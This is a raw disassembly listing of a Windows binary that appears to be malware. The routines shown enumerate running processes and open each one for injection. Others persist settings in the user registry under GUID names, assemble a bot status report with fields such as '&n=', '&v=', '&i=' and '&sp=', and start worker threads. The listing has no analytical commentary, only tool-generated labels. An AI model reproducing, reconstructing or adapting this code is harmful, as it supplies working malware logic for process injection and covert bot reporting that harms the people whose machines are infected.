dd 40858BFFh, 8BFFFFFFh, 0FF44858Ch, 0F633FFFFh, 3B4C458Dh
dd 460B7408h, 830CC083h, 0F37203FEh, 0F66B45EBh, 0FF57570Ch
dd 0FF4C3574h, 40FCE015h, 83D88B00h, 2F74FFFBh, 0FAB405FFh
dd 57570040h, 3574FF53h, 0FF575754h, 40FE1015h, 75C73B00h
dd 15FF530Fh, 40FCC0h, 0FAB40DFFh, 7EB0040h, 0AC15FF50h
dd 390040FDh, 0FFFF40BDh, 0FF8C75FFh, 0FFFF408Dh, 0FF646AFFh
dd 40FAB835h, 0B815FF00h, 850040FDh, 2E850FC0h, 6AFFFFFFh
dd 4C758D03h, 0FF36FF5Fh, 40FCC015h, 0CC68300h, 0FFF2754Fh
dd 40FAB40Dh, 5B5E5F00h, 0C974C583h
db 0C3h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419939 proc near ; CODE XREF: sub_419C1A+58�p
var_23C = dword ptr -23Ch
var_234 = dword ptr -234h
var_218 = byte ptr -218h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 23Ch
mov eax, dword_40FB34
push ebx
push esi
push edi
xor esi, esi
push esi
push esi
push esi
push esi
push 4
push dword ptr [eax+30h]
call sub_41AAD0
add esp, 18h
mov [ebp+var_C], eax
call dword_40FE50 ; GetCurrentThread
mov ebx, eax
push ebx
call dword_40FE4C ; GetThreadPriority
push 1
push ebx
mov [ebp+var_10], eax
call dword_40FE48 ; SetThreadPriority
mov [ebp+var_8], 3
loc_419982: ; CODE XREF: sub_419939+E4�j
push esi
push 2
mov [ebp+var_23C], 22Ch
call dword_40FE14 ; CreateToolhelp32Snapshot
lea ecx, [ebp+var_23C]
push ecx
push eax
mov [ebp+var_4], eax
call dword_40FE18 ; Process32FirstW
jmp short loc_419A0D
; ---------------------------------------------------------------------------
loc_4199A8: ; CODE XREF: sub_419939+D6�j
mov eax, [ebp+var_234]
cmp eax, esi
jz short loc_4199FD
cmp eax, dword_40FCA4
jz short loc_4199FD
cmp eax, [ebp+var_C]
jz short loc_4199FD
lea eax, [ebp+var_218]
push eax
call sub_41B56F
test al, al
pop ecx
jnz short loc_4199FD
push [ebp+var_234]
push esi
push 43Ah
call dword_40FE34 ; OpenProcess
mov edi, eax
cmp edi, esi
jz short loc_4199FD
push [ebp+var_234]
push edi
call sub_4183BE
pop ecx
pop ecx
push edi
call dword_40FDAC ; CloseHandle
loc_4199FD: ; CODE XREF: sub_419939+77�j
; sub_419939+7F�j ...
lea eax, [ebp+var_23C]
push eax
push [ebp+var_4]
call dword_40FE1C ; Process32NextW
loc_419A0D: ; CODE XREF: sub_419939+6D�j
test eax, eax
jnz short loc_4199A8
push [ebp+var_4]
call dword_40FDAC ; CloseHandle
dec [ebp+var_8]
jnz loc_419982
push [ebp+var_10]
push ebx
call dword_40FE48 ; SetThreadPriority
pop edi
pop esi
pop ebx
leave
retn
sub_419939 endp
; =============== S U B R O U T I N E =======================================
sub_419A32 proc near ; CODE XREF: .data:00419AEC�p
; .data:00419B9C�p
push ebx
xor ebx, ebx
mov word ptr [eax+4Ah], 7Dh
mov [eax+4Ch], bx
mov word ptr [eax], 7Bh
inc eax
push esi
mov esi, ecx
inc eax
loc_419A49: ; CODE XREF: sub_419A32+6C�j
mov cl, [esi]
mov dl, cl
shr cl, 4
and dl, 0Fh
cmp cl, 0Ah
movzx ecx, cl
jnb short loc_419A60
add ecx, 30h
jmp short loc_419A63
; ---------------------------------------------------------------------------
loc_419A60: ; CODE XREF: sub_419A32+27�j
add ecx, 37h
loc_419A63: ; CODE XREF: sub_419A32+2C�j
cmp dl, 0Ah
mov [eax], cx
movzx ecx, dl
jnb short loc_419A73
add ecx, 30h
jmp short loc_419A76
; ---------------------------------------------------------------------------
loc_419A73: ; CODE XREF: sub_419A32+3A�j
add ecx, 37h
loc_419A76: ; CODE XREF: sub_419A32+3F�j
mov [eax+2], cx
add eax, 4
cmp bl, 3
jz short loc_419A91
cmp bl, 5
jz short loc_419A91
cmp bl, 7
jz short loc_419A91
cmp bl, 9
jnz short loc_419A98
loc_419A91: ; CODE XREF: sub_419A32+4E�j
; sub_419A32+53�j ...
mov word ptr [eax], 2Dh
inc eax
inc eax
loc_419A98: ; CODE XREF: sub_419A32+5D�j
inc esi
inc bl
cmp bl, 10h
jb short loc_419A49
pop esi
pop ebx
retn
sub_419A32 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, [ebp+8]
sub esp, 58h
cmp eax, 3
push ebx
push esi
push edi
jnz short loc_419ACB
mov eax, [ebp+10h]
and dword ptr [eax], 0
push dword_40FAB8
call dword_40FDBC ; SetEvent
jmp loc_419C13
; ---------------------------------------------------------------------------
loc_419ACB: ; CODE XREF: .data:00419AB2�j
cmp eax, 10h
mov esi, [ebp+10h]
jnz loc_419B7F
cmp dword ptr [esi], 10h
jnz loc_419C10
mov ebx, [ebp+0Ch]
xor edi, edi
mov [esi], edi
mov ecx, [ebx]
lea eax, [ebp-58h]
call sub_419A32
push edi
lea eax, [ebp-4]
push eax
mov eax, dword_40FB34
push edi
push 1
push edi
push edi
push edi
push dword ptr [eax+3Ch]
push 80000001h
call dword_40FBE0
test eax, eax
jnz short loc_419B78
lea eax, [ebp+8]
push eax
push edi
push edi
push edi
lea eax, [ebp-58h]
push eax
push dword ptr [ebp-4]
call dword_40FBDC
test eax, eax
jnz short loc_419B6F
push dword ptr [ebp+8]
call sub_41A81F
cmp eax, edi
pop ecx
mov [ebp-8], eax
jz short loc_419B6F
lea ecx, [ebp+8]
push ecx
push eax
push edi
push edi
lea eax, [ebp-58h]
push eax
push dword ptr [ebp-4]
call dword_40FBDC
test eax, eax
jnz short loc_419B66
push dword ptr [ebx]
call sub_41A83D
mov eax, [ebp-8]
mov [ebx], eax
mov eax, [ebp+8]
mov [esi], eax
jmp short loc_419B6E
; ---------------------------------------------------------------------------
loc_419B66: ; CODE XREF: .data:00419B51�j
push dword ptr [ebp-8]
call sub_41A83D
loc_419B6E: ; CODE XREF: .data:00419B64�j
pop ecx
loc_419B6F: ; CODE XREF: .data:00419B29�j
; .data:00419B39�j
push dword ptr [ebp-4]
call dword_40FBE4
loc_419B78: ; CODE XREF: .data:00419B11�j
mov eax, [esi]
jmp loc_419C15
; ---------------------------------------------------------------------------
loc_419B7F: ; CODE XREF: .data:00419AD1�j
cmp eax, 0Fh
jz short loc_419B8D
cmp eax, 11h
jnz loc_419C10
loc_419B8D: ; CODE XREF: .data:00419B82�j
cmp dword ptr [esi], 10h
jb short loc_419C10
mov edi, [ebp+0Ch]
mov ecx, [edi]
lea eax, [ebp-58h]
xor bl, bl
call sub_419A32
xor eax, eax
push eax
lea ecx, [ebp-4]
push ecx
push eax
push 2
push eax
push eax
push eax
mov eax, dword_40FB34
push dword ptr [eax+3Ch]
push 80000001h
call dword_40FBE0
test eax, eax
jnz short loc_419C08
cmp dword ptr [ebp+8], 11h
jnz short loc_419BDA
lea eax, [ebp-58h]
push eax
push dword ptr [ebp-4]
call dword_40FBEC
jmp short loc_419BF7
; ---------------------------------------------------------------------------
loc_419BDA: ; CODE XREF: .data:00419BC9�j
mov eax, [esi]
sub eax, 10h
push eax
mov eax, [edi]
add eax, 10h
push eax
push 3
push 0
lea eax, [ebp-58h]
push eax
push dword ptr [ebp-4]
call dword_40FBE8
loc_419BF7: ; CODE XREF: .data:00419BD8�j
push dword ptr [ebp-4]
mov ebx, eax
neg ebx
sbb bl, bl
inc bl
call dword_40FBE4
loc_419C08: ; CODE XREF: .data:00419BC3�j
and dword ptr [esi], 0
movzx eax, bl
jmp short loc_419C15
; ---------------------------------------------------------------------------
loc_419C10: ; CODE XREF: .data:00419ADA�j
; .data:00419B87�j ...
and dword ptr [esi], 0
loc_419C13: ; CODE XREF: .data:00419AC6�j
xor eax, eax
loc_419C15: ; CODE XREF: .data:00419B7A�j
; .data:00419C0E�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419C1A proc near ; CODE XREF: .data:00419DC6�p
var_194 = byte ptr -194h
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 194h
mov eax, dword_40FC1C
movzx edx, byte ptr [eax+66h]
movzx ecx, byte ptr [eax+6Ah]
push ebx
add edx, eax
push esi
movzx esi, byte ptr [eax+64h]
mov al, [eax+65h]
add edx, ecx
xor ebx, ebx
lea ecx, [esi+edx+6Ch]
xor dl, dl
cmp al, bl
mov [ebp+var_1], bl
jbe short loc_419C68
loc_419C4C: ; CODE XREF: sub_419C1A+46�j
movzx esi, dl
mov si, [ecx+esi*2]
cmp si, word_40FBAC
jz short loc_419C64
inc dl
cmp dl, al
jb short loc_419C4C
jmp short loc_419C68
; ---------------------------------------------------------------------------
loc_419C64: ; CODE XREF: sub_419C1A+40�j
mov [ebp+var_1], 1
loc_419C68: ; CODE XREF: sub_419C1A+30�j
; sub_419C1A+48�j
call sub_41504B
cmp [ebp+var_1], bl
jnz short loc_419CD7
call sub_419939
lea eax, [ebp+var_194]
push eax
push 2
call dword_40FCE4
inc dword_40FAB4
push ebx
push offset sub_40826C
call sub_41B789
inc dword_40FAB4
push ebx
push offset sub_40C000
call sub_41B789
inc dword_40FAB4
push ebx
push offset sub_40BC8E
call sub_41B789
inc dword_40FAB4
push ebx
push offset sub_408BAD
call sub_41B789
push offset dword_40FAB4
call sub_415655
add esp, 24h
loc_419CD7: ; CODE XREF: sub_419C1A+56�j
pop esi
pop ebx
leave
retn
sub_419C1A endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
push 3Bh
call sub_41BFFA
pop ecx
call sub_41766E
push 2
call dword_40FE50 ; GetCurrentThread
push eax
call dword_40FE48 ; SetThreadPriority
push 14h
push offset dword_40FAB4
call sub_41BE72
pop ecx
pop ecx
xor esi, esi
push esi
push esi
push 1
push esi
call dword_40FDC4 ; CreateEventW
push esi
push esi
push esi
mov dword_40FAB8, eax
mov eax, dword_40FB34
push esi
push dword ptr [eax+38h]
call dword_40FB3C
push 4
lea ecx, [ebp-4]
push ecx
push 2
push eax
mov dword_40FABC, eax
mov dword ptr [ebp-4], 0EA60h
call dword_40FB8C
push esi
call sub_41C198
push 0FFFFFFFFh
mov edi, offset off_40F3E8
push edi
call sub_417F0B
push 0FFFFFFFFh
push edi
push dword_40FD30
call sub_417F96
mov eax, dword_40FB34
push dword ptr [eax+2Ch]
push offset sub_40857D
call sub_41BE85
add esp, 20h
mov edi, eax
mov dword_40FAB4, esi
loc_419D88: ; CODE XREF: .data:00419DBC�j
push 14h
push dword_40FAB8
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jnz short loc_419DA4
mov dword_40FAB4, 1
loc_419DA4: ; CODE XREF: .data:00419D98�j
cmp dword_40FAB4, esi
jnz short loc_419DEB
mov eax, dword_40FB34
push dword ptr [eax+34h]
call sub_41AAAE
test al, al
pop ecx
jnz short loc_419D88
cmp dword_40FAB4, esi
jnz short loc_419DEB
call sub_419C1A
push 0FFFFFFFFh
push dword_40FAB8
call dword_40FDB8 ; WaitForSingleObject
jmp short loc_419DE3
; ---------------------------------------------------------------------------
loc_419DDB: ; CODE XREF: .data:00419DE9�j
push 14h
call dword_40FD68 ; Sleep
loc_419DE3: ; CODE XREF: .data:00419DD9�j
cmp dword_40FAB4, esi
ja short loc_419DDB
loc_419DEB: ; CODE XREF: .data:00419DAA�j
; .data:00419DC4�j
push dword_40FAB8
call dword_40FDAC ; CloseHandle
push dword_40FABC
call dword_40FB40
mov eax, dword_40FB34
push edi
push dword ptr [eax+2Ch]
call sub_41BF68
pop ecx
pop ecx
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ecx
and dword ptr [ebp-4], 0
lea eax, [ebp-8]
push eax
push 2
lea eax, [ebp-4]
push eax
push dword ptr [ebp+0Ch]
call dword_40FB54
test eax, eax
jz loc_419EF8
push esi
push edi
loc_419E3D: ; CODE XREF: .data:00419EF0�j
cmp dword ptr [ebp-8], 2
jnz loc_419EF6
cmp dword ptr [ebp-4], 4
jbe loc_419EF6
push dword ptr [ebp-4]
call sub_41A81F
mov edi, eax
test edi, edi
pop ecx
jz loc_419EF6
push dword_40FAB8
push dword ptr [ebp-4]
push edi
push dword ptr [ebp+0Ch]
call sub_417131
add esp, 10h
cmp eax, [ebp-4]
jnz short loc_419ED7
push 0Ch
call sub_41A81F
mov esi, eax
test esi, esi
pop ecx
jz short loc_419ED0
lea eax, [esi+4]
push eax
mov eax, [ebp-4]
add eax, 0FFFFFFFCh
push eax
lea eax, [edi+4]
push eax
call sub_41AF95
add esp, 0Ch
test eax, eax
mov [esi+8], eax
jz short loc_419EC9
push 4
push edi
push esi
call sub_41A857
inc dword_40FAB4
push esi
push offset sub_407335
call sub_41B789
add esp, 14h
jmp short loc_419ED0
; ---------------------------------------------------------------------------
loc_419EC9: ; CODE XREF: .data:00419EA8�j
push esi
call sub_41A83D
pop ecx
loc_419ED0: ; CODE XREF: .data:00419E8A�j
; .data:00419EC7�j
push edi
call sub_41A83D
pop ecx
loc_419ED7: ; CODE XREF: .data:00419E7C�j
and dword ptr [ebp-4], 0
lea eax, [ebp-8]
push eax
push 2
lea eax, [ebp-4]
push eax
push dword ptr [ebp+0Ch]
call dword_40FB54
test eax, eax
jnz loc_419E3D
loc_419EF6: ; CODE XREF: .data:00419E41�j
; .data:00419E4B�j ...
pop edi
pop esi
loc_419EF8: ; CODE XREF: .data:00419E35�j
mov al, 1
leave
retn 8
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov ecx, [ebp+10h]
xor eax, eax
sub esp, 10h
mov [ecx], eax
mov ecx, [ebp+14h]
push esi
mov esi, [ebp+8]
mov [ecx], eax
mov cl, [esi]
mov dl, cl
inc dl
test cl, cl
mov [esi], dl
jbe short loc_419F27
xor al, al
jmp loc_41A0CE
; ---------------------------------------------------------------------------
loc_419F27: ; CODE XREF: .data:00419F1E�j
push ebx
mov [ebp+14h], eax
push edi
lea eax, [ebp+14h]
push eax
mov byte ptr [esi+2], 1
push dword_40FABC
call sub_4176F7
push 2
push offset a2 ; "2="
push dword ptr [ebp+0Ch]
mov bl, al
call sub_41A875
add esp, 14h
push dword_40FB2C
mov edi, eax
call dword_40FD94 ; lstrlenA
push eax
push dword_40FB2C
push edi
call sub_41A875
push 3
pop edi
push edi
push offset aN ; "&n="
push eax
call sub_41A875
mov cl, [esi+1]
push edi
mov [eax], cl
inc eax
push offset aV ; "&v="
push eax
call sub_41A875
push 0Ah
pop esi
mov [ebp+10h], eax
push esi
lea eax, [ebp-10h]
push eax
mov eax, dword_40FC1C
push dword ptr [eax+40h]
call sub_41A44B
push eax
lea eax, [ebp-10h]
push eax
push dword ptr [ebp+10h]
call sub_41A875
push edi
push offset aI ; "&i="
push eax
call sub_41A875
mov [ebp+10h], eax
mov eax, dword_40FC1C
add esp, 48h
add eax, 44h
push 4
push eax
lea eax, [ebp-10h]
push eax
call sub_41A857
add esp, 0Ch
lea eax, [ebp-10h]
push eax
mov byte ptr [ebp-0Ch], 0
call dword_40FD94 ; lstrlenA
push eax
lea eax, [ebp-10h]
push eax
push dword ptr [ebp+10h]
call sub_41A875
push edi
push offset aS ; "&s="
push eax
call sub_41A875
mov edi, eax
push esi
lea eax, [ebp-10h]
push eax
push dword ptr [ebp+14h]
call sub_41A44B
push eax
lea eax, [ebp-10h]
push eax
push edi
call sub_41A875
push 4
push offset aSp ; "&sp="
push eax
call sub_41A875
movzx ecx, word_40FAC0
mov edi, eax
lea eax, [ebp-10h]
push esi
push eax
mov al, bl
neg al
sbb eax, eax
not eax
and eax, ecx
push eax
call sub_41A44B
add esp, 48h
push eax
lea eax, [ebp-10h]
push eax
push edi
call sub_41A875
push 5
push offset aLcp ; "&lcp="
push eax
call sub_41A875
movzx ecx, word_40FAC4
mov edi, eax
lea eax, [ebp-10h]
push esi
push eax
mov al, bl
neg al
sbb eax, eax
not eax
and eax, ecx
push eax
call sub_41A44B
push eax
lea eax, [ebp-10h]
push eax
push edi
call sub_41A875
push 4
push offset aPr ; "&pr="
push eax
call sub_41A875
neg bl
mov edi, eax
push esi
lea eax, [ebp-10h]
push eax
movzx eax, word_40FAC2
sbb ebx, ebx
not ebx
and ebx, eax
push ebx
call sub_41A44B
add esp, 48h
push eax
lea eax, [ebp-10h]
push eax
push edi
call sub_41A875
add esp, 0Ch
pop edi
mov byte ptr [eax], 0
mov al, 1
pop ebx
loc_41A0CE: ; CODE XREF: .data:00419F22�j
pop esi
leave
retn 10h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
push 7D0h
call dword_40FD68 ; Sleep
lea eax, [ebp-10h]
push eax
mov esi, offset dword_401468
push esi
call sub_41B99C
xor ebx, ebx
cmp eax, ebx
pop ecx
pop ecx
mov [ebp-8], eax
jz short loc_41A130
cmp eax, 4
jz short loc_41A10C
or dword ptr [ebp-8], 0FFFFFFFFh
jmp short loc_41A120
; ---------------------------------------------------------------------------
loc_41A10C: ; CODE XREF: .data:0041A104�j
push 4
push dword ptr [ebp-10h]
lea eax, [ebp-8]
push eax
mov [ebp-8], ebx
call sub_41A857
add esp, 0Ch
loc_41A120: ; CODE XREF: .data:0041A10A�j
push dword ptr [ebp-10h]
call sub_41A83D
mov eax, [ebp-8]
cmp eax, ebx
pop ecx
jnz short loc_41A136
loc_41A130: ; CODE XREF: .data:0041A0FF�j
mov byte ptr [ebp-3], 31h
jmp short loc_41A156
; ---------------------------------------------------------------------------
loc_41A136: ; CODE XREF: .data:0041A12E�j
mov ecx, dword_40FC1C
cmp eax, [ecx+40h]
jb short loc_41A152
push 1388h
mov byte ptr [ebp-3], 30h
call dword_40FD68 ; Sleep
jmp short loc_41A156
; ---------------------------------------------------------------------------
loc_41A152: ; CODE XREF: .data:0041A13F�j
mov byte ptr [ebp-3], 32h
loc_41A156: ; CODE XREF: .data:0041A134�j
; .data:0041A150�j
mov [ebp-0Ch], ebx
loc_41A159: ; CODE XREF: .data:0041A1C5�j
mov eax, dword_40FC1C
mov edi, [eax+60h]
lea eax, [ebp-4]
push eax
push offset sub_4088F1
push offset sub_4089D8
push dword_40FABC
mov [ebp-4], bl
mov [ebp-2], bl
call sub_4178FE
add esp, 10h
test al, al
jz short loc_41A1B6
cmp [ebp-2], bl
jz short loc_41A1B6
mov eax, [ebp-0Ch]
inc dword ptr [ebp-0Ch]
test eax, eax
jnz short loc_41A1AE
mov eax, dword_40FC1C
push 4
add eax, 40h
push eax
push esi
call sub_41B9E9
add esp, 0Ch
mov byte ptr [ebp-3], 30h
loc_41A1AE: ; CODE XREF: .data:0041A194�j
mov eax, dword_40FC1C
mov edi, [eax+5Ch]
loc_41A1B6: ; CODE XREF: .data:0041A185�j
; .data:0041A18A�j
push edi
push dword_40FAB8
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jnz short loc_41A159
dec dword_40FAB4
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
sub_41A1D4 proc near ; CODE XREF: sub_414C49+209�p
; .data:00414F68�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
test ecx, ecx
jz short loc_41A1F7
mov eax, [esp+arg_4]
cmp eax, 2
jb short loc_41A1F7
add eax, ecx
cmp byte ptr [eax-1], 0
jnz short loc_41A1F7
cmp byte ptr [eax-2], 0
jnz short loc_41A1F7
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41A1F7: ; CODE XREF: sub_41A1D4+6�j
; sub_41A1D4+F�j ...
xor eax, eax
retn
sub_41A1D4 endp
; =============== S U B R O U T I N E =======================================
sub_41A1FA proc near ; CODE XREF: .data:00414FD8�p
; sub_41735E+BD�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
xor eax, eax
xor edx, edx
loc_41A202: ; CODE XREF: sub_41A1FA+1D�j
cmp byte ptr [eax+ecx], 0
jnz short loc_41A216
cmp byte ptr [eax+ecx+1], 0
jz short loc_41A219
inc edx
cmp edx, [esp+arg_4]
jz short loc_41A21C
loc_41A216: ; CODE XREF: sub_41A1FA+C�j
inc eax
jmp short loc_41A202
; ---------------------------------------------------------------------------
loc_41A219: ; CODE XREF: sub_41A1FA+13�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41A21C: ; CODE XREF: sub_41A1FA+1A�j
lea eax, [eax+ecx+1]
retn
sub_41A1FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A221 proc near ; CODE XREF: sub_4176F7+178�p
; .data:0041929F�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
xor esi, esi
test byte ptr [ebp+arg_18], 8
push edi
jz short loc_41A2A9
mov edi, [ebp+arg_14]
and [ebp+arg_18], 0FFFFFFF7h
cmp edi, esi
jz short loc_41A246
cmp dword ptr [edi], 0FFFFFFFFh
mov [ebp+var_1], 1
jz short loc_41A24A
loc_41A246: ; CODE XREF: sub_41A221+1A�j
mov [ebp+var_1], 0
loc_41A24A: ; CODE XREF: sub_41A221+23�j
mov ebx, [ebp+arg_10]
cmp ebx, esi
jnz short loc_41A254
lea ebx, [ebp+var_10]
loc_41A254: ; CODE XREF: sub_41A221+2E�j
cmp [ebp+arg_C], esi
jbe short loc_41A282
loc_41A259: ; CODE XREF: sub_41A221+5F�j
push [ebp+arg_18]
mov eax, [ebp+arg_C]
push edi
push ebx
sub eax, esi
push eax
mov eax, [ebp+arg_8]
add eax, esi
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41A221
add esp, 1Ch
test al, al
jnz short loc_41A289
inc esi
cmp esi, [ebp+arg_C]
jb short loc_41A259
loc_41A282: ; CODE XREF: sub_41A221+36�j
; sub_41A221+C6�j ...
xor al, al
loc_41A284: ; CODE XREF: sub_41A221+188�j
; sub_41A221+195�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41A289: ; CODE XREF: sub_41A221+59�j
cmp [ebp+var_1], 0
jz short loc_41A29A
mov eax, [edi]
cmp eax, 0FFFFFFFFh
jz short loc_41A29A
add eax, esi
mov [edi], eax
loc_41A29A: ; CODE XREF: sub_41A221+6C�j
; sub_41A221+73�j
test ebx, ebx
jz loc_41A3A7
add [ebx], esi
jmp loc_41A3A7
; ---------------------------------------------------------------------------
loc_41A2A9: ; CODE XREF: sub_41A221+F�j
mov edi, [ebp+arg_4]
xor ebx, ebx
test edi, edi
jz loc_41A39E
mov eax, [ebp+arg_18]
and eax, 2
mov [ebp+var_10], eax
xor eax, eax
inc eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
loc_41A2C8: ; CODE XREF: sub_41A221+177�j
cmp [ebp+var_10], 0
mov eax, [ebp+arg_0]
mov dl, [ebx+eax]
jnz short loc_41A2DF
mov al, dl
sub al, 41h
cmp al, 19h
ja short loc_41A2DF
add dl, 20h
loc_41A2DF: ; CODE XREF: sub_41A221+B1�j
; sub_41A221+B9�j
cmp dl, 23h
jnz short loc_41A2EE
cmp esi, [ebp+arg_C]
jz short loc_41A282
jmp loc_41A38B
; ---------------------------------------------------------------------------
loc_41A2EE: ; CODE XREF: sub_41A221+C1�j
cmp dl, 2Ah
jz loc_41A3BB
cmp [ebp+var_10], 0
mov eax, [ebp+arg_8]
mov cl, [esi+eax]
jnz short loc_41A315
cmp cl, 41h
jl short loc_41A315
cmp cl, 5Ah
jg short loc_41A315
movsx eax, cl
add eax, 20h
jmp short loc_41A318
; ---------------------------------------------------------------------------
loc_41A315: ; CODE XREF: sub_41A221+E0�j
; sub_41A221+E5�j ...
movsx eax, cl
loc_41A318: ; CODE XREF: sub_41A221+F2�j
movsx edi, dl
cmp edi, eax
jz short loc_41A37D
test byte ptr [ebp+arg_18], 1
jz loc_41A282
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_C]
jnb short loc_41A34B
cmp cl, 0Dh
jnz short loc_41A34B
mov eax, [ebp+arg_8]
cmp byte ptr [esi+eax+1], 0Ah
jnz short loc_41A34B
cmp dl, 0Ah
jnz short loc_41A34B
inc esi
inc [ebp+var_8]
jmp short loc_41A38B
; ---------------------------------------------------------------------------
loc_41A34B: ; CODE XREF: sub_41A221+10E�j
; sub_41A221+113�j ...
mov eax, [ebp+var_C]
cmp eax, [ebp+arg_4]
jnb loc_41A282
cmp dl, 0Dh
jnz loc_41A282
mov eax, [ebp+arg_0]
cmp byte ptr [ebx+eax+1], 0Ah
jnz loc_41A282
cmp cl, 0Ah
jnz loc_41A282
inc ebx
inc [ebp+var_C]
jmp short loc_41A38B
; ---------------------------------------------------------------------------
loc_41A37D: ; CODE XREF: sub_41A221+FC�j
mov eax, [ebp+arg_14]
test eax, eax
jz short loc_41A38B
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_41A38B
mov [eax], esi
loc_41A38B: ; CODE XREF: sub_41A221+C8�j
; sub_41A221+128�j ...
mov edi, [ebp+arg_4]
inc esi
inc [ebp+var_8]
inc ebx
inc [ebp+var_C]
cmp ebx, edi
jnz loc_41A2C8
loc_41A39E: ; CODE XREF: sub_41A221+8F�j
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_41A3AE
mov [eax], esi
loc_41A3A7: ; CODE XREF: sub_41A221+7B�j
; sub_41A221+83�j ...
mov al, 1
jmp loc_41A284
; ---------------------------------------------------------------------------
loc_41A3AE: ; CODE XREF: sub_41A221+182�j
xor eax, eax
cmp esi, [ebp+arg_C]
setz al
jmp loc_41A284
; ---------------------------------------------------------------------------
loc_41A3BB: ; CODE XREF: sub_41A221+D0�j
lea eax, [ebx+1]
cmp eax, edi
jnz short loc_41A3D0
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_41A3A7
mov ecx, [ebp+arg_C]
mov [eax], ecx
jmp short loc_41A3A7
; ---------------------------------------------------------------------------
loc_41A3D0: ; CODE XREF: sub_41A221+19F�j
mov eax, [ebp+arg_14]
test eax, eax
jz short loc_41A3E0
cmp dword ptr [eax], 0FFFFFFFFh
mov [ebp+var_1], 1
jz short loc_41A3E4
loc_41A3E0: ; CODE XREF: sub_41A221+1B4�j
mov [ebp+var_1], 0
loc_41A3E4: ; CODE XREF: sub_41A221+1BD�j
cmp esi, [ebp+arg_C]
jnb loc_41A282
mov eax, [ebp+arg_0]
sub edi, ebx
dec edi
lea ebx, [ebx+eax+1]
loc_41A3F7: ; CODE XREF: sub_41A221+1FD�j
push [ebp+arg_18]
mov eax, [ebp+arg_C]
push [ebp+arg_14]
sub eax, esi
push [ebp+arg_10]
push eax
mov eax, [ebp+arg_8]
add eax, esi
push eax
push edi
push ebx
call sub_41A221
add esp, 1Ch
test al, al
jnz short loc_41A425
inc esi
cmp esi, [ebp+arg_C]
jb short loc_41A3F7
jmp loc_41A282
; ---------------------------------------------------------------------------
loc_41A425: ; CODE XREF: sub_41A221+1F7�j
cmp [ebp+var_1], 0
jz short loc_41A439
mov ecx, [ebp+arg_14]
mov eax, [ecx]
cmp eax, 0FFFFFFFFh
jz short loc_41A439
add eax, esi
mov [ecx], eax
loc_41A439: ; CODE XREF: sub_41A221+208�j
; sub_41A221+212�j
mov eax, [ebp+arg_10]
test eax, eax
jz loc_41A3A7
add [eax], esi
jmp loc_41A3A7
sub_41A221 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A44B proc near ; CODE XREF: .data:0041883D�p
; .data:00419FA2�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
movzx edi, [ebp+arg_8]
mov ecx, esi
loc_41A45A: ; CODE XREF: sub_41A44B+2B�j
mov eax, [ebp+arg_0]
xor edx, edx
div edi
cmp edx, 9
mov [ebp+arg_0], eax
lea eax, [edx+37h]
ja short loc_41A46F
lea eax, [edx+30h]
loc_41A46F: ; CODE XREF: sub_41A44B+1F�j
mov [ecx], al
inc ecx
cmp [ebp+arg_0], 0
ja short loc_41A45A
mov eax, ecx
sub eax, esi
mov byte ptr [ecx], 0
dec ecx
loc_41A480: ; CODE XREF: sub_41A44B+41�j
mov bl, [esi]
mov dl, [ecx]
mov [ecx], bl
dec ecx
mov [esi], dl
inc esi
cmp esi, ecx
jb short loc_41A480
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41A44B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A493 proc near ; CODE XREF: sub_4156FF+25�p
; sub_415FD3+A8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
cmp eax, 0FFFFFFFFh
push ebx
push esi
mov esi, [ebp+arg_C]
push edi
jnz short loc_41A4CB
cmp esi, eax
jnz short loc_41A4E0
mov esi, [ebp+arg_4]
mov edx, [ebp+arg_0]
jmp short loc_41A4BA
; ---------------------------------------------------------------------------
loc_41A4B0: ; CODE XREF: sub_41A493+31�j
test cl, cl
jz loc_41A564
inc edx
inc esi
loc_41A4BA: ; CODE XREF: sub_41A493+1B�j
mov cl, [esi]
movsx eax, byte ptr [edx]
movsx edi, cl
